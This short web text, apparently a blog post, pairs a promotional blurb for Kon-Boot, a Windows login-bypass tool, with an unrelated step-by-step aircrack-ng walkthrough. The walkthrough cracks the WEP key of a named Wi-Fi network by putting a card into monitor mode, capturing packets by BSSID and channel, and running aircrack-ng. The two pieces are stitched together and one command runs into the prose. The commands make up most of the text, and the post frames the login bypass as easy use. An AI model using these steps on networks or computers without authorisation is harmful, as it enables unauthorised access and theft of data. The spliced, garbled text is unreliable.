Kon-Boot is an application which will silently bypass the authentication process of Windows based operating systems. Without overwriting your old password! In other words you can login to your Windows profile without knowing your password. Easy to use and excellent for tech repairs, data recovery and security audits.
Note down the interface on which you want to start the monitoring. In my case it is wlan0 so I will be using wlan0.
Enter: airmon-ng start wlan0 If the result looks like this: then your card is in monitor mode.
Note down the monitoring interface’s name (“monitor mode enabled on mon0“). In my case it is mon0 so I will be using mon0.
Enter: airodump-ng mon0
My target is “mtnl” which is using WEP encryption and authentication. Wifi “mtnl” is working on channel 4 and BSSID (or bssid) is 0C:D2:B5:03:43:68. I will be using this information. Enter: airodump-ng –w mtnl-org –c 4 –bssid 0C:D2:B5:03:43:68 mon0
After about 15,000 packets have been captured, enter: aircrack-ng mtnl-org-01.capto start cracking the WEP password.